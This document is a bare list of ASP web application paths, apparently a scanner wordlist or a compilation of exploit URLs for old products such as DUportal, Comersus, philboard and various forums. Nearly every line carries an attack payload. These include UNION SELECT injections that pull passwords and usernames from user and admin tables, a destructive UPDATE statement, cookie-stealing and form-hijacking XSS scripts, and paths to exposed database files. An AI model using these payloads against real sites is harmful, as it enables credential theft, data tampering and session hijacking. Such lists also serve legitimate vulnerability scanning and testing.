/dUpro/Classifieds/../Pictures/detail.asp?iData=3&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Classifieds/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=520&iChannel=3&nChannel=Pictures
/dUpro/Classifieds/detail.asp?iData=14&iCat=351&iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/detail.asp?iData=14&iCat=351&iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Classifieds/detail.asp?iData=&#039;SQL_INJECTION&iCat=351&iChannel=7&nChannel=Classifieds
/dUpro/Events/../events/detail.asp?iData=5&iCat=327&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/events/../events/detail.asp?iData=5&iCat=327&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../events/detail.asp?iData=5&iCat=327&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/events/../events/detail.asp?iData=5&iCat=327&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Events/../events/detail.asp?iData=&#039;SQL_INJECTION&iCat=327&iChannel=6&nChannel=Events
/dUpro/events/../events/detail.asp?iData=&#039;SQL_INJECTION&iCat=327&iChannel=6&nChannel=Events
/dUpro/events/../Pictures/detail.asp?iData=49&iCat=505&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Pictures/detail.asp?iData=49&iCat=505&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/events/../Pictures/detail.asp?iData=49&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Events/../Pictures/detail.asp?iData=5&iCat=520&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Pictures/detail.asp?iData=5&iCat=520&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Events/../Pictures/detail.asp?iData=5&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/events/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=505&iChannel=3&nChannel=Pictures
/dUpro/Events/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=520&iChannel=3&nChannel=Pictures
/dUpro/Files/../Pictures/detail.asp?iData=8&iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Files/../Pictures/detail.asp?iData=8&iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Files/../Pictures/detail.asp?iData=8&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Files/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=206&iChannel=3&nChannel=Pictures
/dUpro/Files/detail.asp?iData=4&iCat=433&iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Files/detail.asp?iData=4&iCat=433&iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Files/detail.asp?iData=&#039;SQL_INJECTION&iCat=433&iChannel=4&nChannel=Files
/dUpro/home/../Articles/detail.asp?iData=26&iCat=238&iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Articles/detail.asp?iData=26&iCat=238&iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/home/../Articles/detail.asp?iData=&#039;SQL_INJECTION&iCat=238&iChannel=2&nChannel=Articles
/dUpro/home/../Businesses/detail.asp?iData=16&iCat=548&iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Businesses/detail.asp?iData=16&iCat=548&iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/home/../Businesses/detail.asp?iData=&#039;SQL_INJECTION&iCat=548&iChannel=18&nChannel=Businesses
/dUpro/home/../Classifieds/detail.asp?iData=15&iCat=222&iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Classifieds/detail.asp?iData=15&iCat=222&iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/home/../Classifieds/detail.asp?iData=&#039;SQL_INJECTION&iCat=222&iChannel=7&nChannel=Classifieds
/dUpro/home/../Entertainments/detail.asp?iData=4&iCat=605&iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Entertainments/detail.asp?iData=4&iCat=605&iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/home/../Entertainments/detail.asp?iData=&#039;SQL_INJECTION&iCat=605&iChannel=19&nChannel=Entertainments
/dUpro/home/../Events/detail.asp?iData=24&iCat=247&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Events/detail.asp?iData=24&iCat=247&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/home/../Events/detail.asp?iData=5&iCat=327&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Events/detail.asp?iData=5&iCat=327&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/home/../Events/detail.asp?iData=&#039;SQL_INJECTION&iCat=247&iChannel=6&nChannel=Events
/dUpro/home/../Events/detail.asp?iData=&#039;SQL_INJECTION&iCat=327&iChannel=6&nChannel=Events
/dUpro/home/../Files/detail.asp?iData=5&iCat=434&iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Files/detail.asp?iData=5&iCat=434&iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/home/../Files/detail.asp?iData=&#039;SQL_INJECTION&iCat=434&iChannel=4&nChannel=Files
/dUpro/home/../Links/detail.asp?iData=6&iCat=390&iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Links/detail.asp?iData=6&iCat=390&iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/home/../Links/detail.asp?iData=&#039;SQL_INJECTION&iCat=390&iChannel=5&nChannel=Links
/dUpro/home/../News/detail.asp?iData=21&iCat=250&iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/home/../news/detail.asp?iData=21&iCat=250&iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/home/../News/detail.asp?iData=21&iCat=250&iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/home/../news/detail.asp?iData=21&iCat=250&iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/home/../News/detail.asp?iData=&#039;SQL_INJECTION&iCat=250&iChannel=1&nChannel=News
/dUpro/home/../news/detail.asp?iData=&#039;SQL_INJECTION&iCat=250&iChannel=1&nChannel=News
/dUpro/home/../Pictures/detail.asp?iData=51&iCat=209&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=51&iCat=209&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=51&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=53&iCat=510&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=53&iCat=510&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=53&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=54&iCat=514&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=54&iCat=514&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=54&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=55&iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=55&iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=55&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=56&iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=56&iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=56&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=6&iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=6&iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=6&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=7&iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/detail.asp?iData=7&iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=7&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=206&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=209&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=510&iChannel=3&nChannel=Pictures
/dUpro/home/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=514&iChannel=3&nChannel=Pictures
/dUpro/home/../Products/detail.asp?iData=9&iCat=231&iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Products/detail.asp?iData=9&iCat=231&iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/home/../Products/detail.asp?iData=&#039;SQL_INJECTION&iCat=231&iChannel=8&nChannel=Products
/dUpro/home/../Topics/detail.asp?iData=29&iCat=478&iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/home/../Topics/detail.asp?iData=29&iCat=&#039;SQL_INJECTION&iChannel=16&nChannel=Topics
/dUpro/home/../Topics/detail.asp?iData=&#039;SQL_INJECTION&iCat=478&iChannel=16&nChannel=Topics
/dUpro/Pictures/../Pictures/detail.asp?iData=5&iCat=520&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../Pictures/detail.asp?iData=5&iCat=520&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/../Pictures/detail.asp?iData=5&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Pictures/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=520&iChannel=3&nChannel=Pictures
/dUpro/Pictures/detail.asp?iData=10&iCat=499&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/detail.asp?iData=10&iCat=499&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/detail.asp?iData=10&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=499&iChannel=3&nChannel=Pictures
/dUpro/polls/../polls/../Pictures/detail.asp?iData=30&iCat=208&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../Pictures/detail.asp?iData=30&iCat=208&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/polls/../polls/../Pictures/detail.asp?iData=30&iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/polls/../polls/../Pictures/detail.asp?iData=&#039;SQL_INJECTION&iCat=208&iChannel=3&nChannel=Pictures
/dUpro/Topics/../topics/detail.asp?iData=28&iCat=479&iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Topics/../topics/detail.asp?iData=28&iCat=&#039;SQL_INJECTION&iChannel=16&nChannel=Topics
/dUpro/Topics/../topics/detail.asp?iData=&#039;SQL_INJECTION&iCat=479&iChannel=16&nChannel=Topics
/dUpro/Topics/../topics/detail.asp?iData=&#039;SQL_INJECTION&iCat=479&iChannel=16&nChannel=Topics
/dUpro/Businesses/detail.asp?iData=1&iCat=&#039;SQL_ERRORS&iChannel=18&nChannel=Businesses
/dUpro/Classifieds/detail.asp?iData=14&iCat=&#039;SQL_ERRORS&iChannel=7&nChannel=Classifieds
/dUpro/Events/../events/detail.asp?iData=5&iCat=&#039;SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/events/../events/detail.asp?iData=5&iCat=&#039;SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/Files/detail.asp?iData=4&iCat=&#039;SQL_ERRORS&iChannel=4&nChannel=Files
/dUpro/home/../Articles/detail.asp?iData=26&iCat=&#039;SQL_ERRORS&iChannel=2&nChannel=Articles
/dUpro/home/../Businesses/detail.asp?iData=16&iCat=&#039;SQL_ERRORS&iChannel=18&nChannel=Businesses
/dUpro/home/../Classifieds/detail.asp?iData=15&iCat=&#039;SQL_ERRORS&iChannel=7&nChannel=Classifieds
/dUpro/home/../Entertainments/detail.asp?iData=4&iCat=&#039;SQL_ERRORS&iChannel=19&nChannel=Entertainments
/dUpro/home/../Events/detail.asp?iData=24&iCat=&#039;SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/home/../Events/detail.asp?iData=5&iCat=&#039;SQL_ERRORS&iChannel=6&nChannel=Events
/dUpro/home/../Files/detail.asp?iData=5&iCat=&#039;SQL_ERRORS&iChannel=4&nChannel=Files
/dUpro/home/../Links/detail.asp?iData=6&iCat=&#039;SQL_ERRORS&iChannel=5&nChannel=Links
/dUpro/home/../News/detail.asp?iData=21&iCat=&#039;SQL_ERRORS&iChannel=1&nChannel=News
/dUpro/home/../news/detail.asp?iData=21&iCat=&#039;SQL_ERRORS&iChannel=1&nChannel=News
/dUpro/home/../Products/detail.asp?iData=9&iCat=&#039;SQL_ERRORS&iChannel=8&nChannel=Products
/dUpro/home/../Topics/detail.asp?iData=29&iCat=478&iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Topics/../topics/detail.asp?iData=28&iCat=479&iChannel=16&nChannel=&#039;SQL_ERRORS 
/forum/forum.asp?pageid=1&H_ID=9 [ SQL INJEC] 
/path/?mod=search&type=simple&q=[XSS] 
/[product]/check_user.asp">
/[product]/check_user.asp">
/search.asp?Search="><script>alert()</script>
/index.asp?alpha=[SQL INJECTION] 
/cezanneweb/home.asp?CFTARGET=";}alert("S21sec")</SCRIPT>%20-->
/aspmforum/kullanicilistesi.asp?harf=[sql injection]
/haber.asp?id=[SqL]
/haber.asp?id=-1%20union%20select%20*%20from%20haberler%20where%20id=82
/admin_group_details.asp?mode=%3C/textarea%3E&#039;%22%3E%3Cscript%3Ealert(&#039;document.cookie&#039;)%3C/script%3E
/shoppingdirectory/midicart.mdb
/searchkey.asp?Keyword='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/path/admin/view.asp?SearchFor=[SQL]
/news/news.mdb
/news.mdb 
/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance 
//script_path/philboard_forum.asp?forumid=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users
/PATH/catalogue.asp?keyword=[sql]
/PATH/catalogue.asp?cid='[sql]
/PATH//viewDetail.asp?pid='[sql]
/DUclassified/adDetail.asp?cat_id=1;[SQL INJECT]&sub_id=1;[SQL INJECT]
/site/message.asp?message=[script]alert(document.cookie);[/script] 
/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep 
/CallManagerAddress/ccmadmin/phonelist.asp?findBy=description&match=begins&pattern=<script>alert(document.cookie)</script>&submit1=Find&rows=20&wildcards=on&utilityList=
/db/[DB-FILE-NAME]
/search_listing.asp?category='[sql]
/search_listing.asp?agent='[sql]
/pmprojects.asp?projectid=[XSS]
/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users 
/search.asp?searchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/login.asp?c=/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/register.asp">
/activate.asp?p=USERNAME
/category.asp?catcode=[SqlInjection]
/category.asp?catcode=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname='[Username]' 
/admin/hosting/error.asp?error=<script>alert(do cument.cookie)</script>
/search.asp?categoryName=1&SH1=[xss]
/web/usermgr/userlist.asp
/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice='[sql]
/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice=0&amaxprice='[sql]
/result.asp?city=1&cat=2&imageField2=1&State=1&aminprice=0&amaxprice=10000000&abedrooms='[sql]
/[path]/default.asp
/errors/rights.asp?awReadAccessRight=True&msg=<script>alert('XSS')</script>
/ow.asp?p=[XSS]
/press/details.asp?Press_Release_ID=[SQL] 
/comersus6/store/comersus_optAffiliateRegistrationExec.asp?name=1&email='&Submit=Join%20now%21
/comersus6/store/comersus_optReviewReadExec.asp?idProduct='&description= 
/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] http
/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab 
/test_DUportal/home/../home/channel.asp?iChannel='SQL_INJECTION&nChannel=Articles
/login.asp?sent=[sql]
/[Forum target]/login.asp
/[path]/index.asp?mid=[SQL Injection]
/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo=[SQL]&validate=1 
/search.asp?in=y&keyword='[sql]
/search.asp?in=y&keyword=1&submit=Search&order='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect=1&type=1&city=1&minprice=1&maxprice=1&state='[sql]
/[path]/listings.asp?itemID=[SQL]
/forums/failure.asp?err_txt=<script>alert(document.cookie);</script>
/[patch]/blog.asp?=>"&#039;><ScRiPt>alert(1369)</ScRiPt>
/services/details.asp?Service_ID=[SQL] 
/[path to script]/editor_haber/hata.asp?hata=[XSS]
/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt> 
/store/login.asp?message='"><script>alert(document.cookie)</script>&redirect= 
/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users 
/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin
/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4
/shopadmin.asp name=LoginForm method=POST>
/dircat.asp?cid=[sql]
/pop_mail.asp?RC=[sql]
/loisweb/index.asp?topic=./links/results&resultstype=1&qs=396&qt=+qaq++[5]+%3D+%27%27+ANY_SQL_HERE
/MHCwa/DefaultAn.aspx?LayoutID=<script>alert(&#039;XSS&#039;)</script>
/mndir/enter.asp?gguvenlik=1&guvenlik=1&kuladi=victim&password=pass
/mndir/Your_Account.asp?op=RegTheme&theme=default&#039;,seviye=&#039;1
/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME='SQL_INJECTION
/mcart2pal/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME='SQL_INJECTION 
/forum/search.asp?KW=|SQL|
/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';-- 
/mcart2pfp/productsByCategory.asp?strSubCatalogID='SQL_INJECTION&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME=Laptops
/mcart2pal/productsByCategory.asp?strSubCatalogID=%27SQL_INJECTION&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME=Laptops
/mcart2sqluk/productsByCategory.asp?strSubCatalogID='SQL_INJECTION 
/sa3.5.2.14/scripts/openPolicy.asp?policy='[sql]
/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users-- 
/detail.asp?property_id='[sql]
/imagegallery/subList.asp?CatID=&#039;
/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&password=&ret_page=
/login.asp?user_name=&password=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ret_page=
/login.asp?email=sd%40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search_btn=SEND&action=lookup&do_search=1
/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln] 
/activeauctionsuperstore/ItemInfo.asp?itemID='SQL_INJECTION 
/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type="><script>alert("PWND")</script> 
/?>"'><ScRiPt>alert(1369)</ScRiPt> 
/poll/default.asp?catid=1+union+select+0,password+from+users 
/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));-- 
/owListProduct.asp?bSpecials='SQL_INJECTION
/owListProduct.asp?idCategory='SQL_INJECTION 
/login.asp?ret_page=[XSS]
/Data/settings.xml
/pilot.asp?srch=[sql]
/PATH/location.asp?name="><script>alert('JosS')</script> http
/dora/default.asp?goster=iletisim
//dora/default.asp?goster=emlakdetay&id= [SQL]
/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http
/backOfficePlus/comersus_backoffice_searchItemForm.asp?forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE] 
/lab/site/yonetim_kullanici_duzenle.asp?id=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI
/lab/site/yonetim_kullanici_duzenle.asp?id=1+union+select+0,1,PAROLA,3+from+KULLANICI
/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,PAROLA,3+from+KULLANICI
/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI
/lab/site/yonetim_kategori_duzenle.asp?ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI
/lab/site/yonetim_kategori_duzenle.asp?islem=duzenle&ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI
/lab/site/yonetim_site_onayla.asp?ID=1+union+select+0,1,KULLANICIADI,3,4,PAROLA,6,7,8,9,1,1+from+KULLANICI
/dUpro/Businesses/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/Businesses/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Businesses/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Businesses/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/Businesses/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Businesses/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Businesses/../events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Businesses/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Businesses/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/Businesses/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Businesses/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Businesses/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/Businesses/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Classifieds/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/Classifieds/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Classifieds/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Classifieds/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Entertainments/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/Classifieds/../Events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../events/default.asp?iChannel=6&nChannel=&#039;SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Classifieds/../Events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Classifieds/../events/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Classifieds/../Files/default.asp?iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Files/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Classifieds/../Links/default.asp?iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Links/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/Classifieds/../News/default.asp?iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../News/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/Classifieds/../Pictures/default.asp?iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Pictures/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Classifieds/../Polls/default.asp?iChannel=15&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Polls/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Polls
/dUpro/Classifieds/../Products/default.asp?iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../Products/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/Classifieds/../Topics/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Events/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Articles/default.asp?iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/events/../Articles/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/Events/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Businesses/default.asp?iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/events/../Businesses/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Events/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Classifieds/default.asp?iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Events/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/events/../Classifieds/default.asp?iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Events/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/events/../Entertainments/default.asp?iChannel=19&nChannel=&#039;SQL_INJECTION
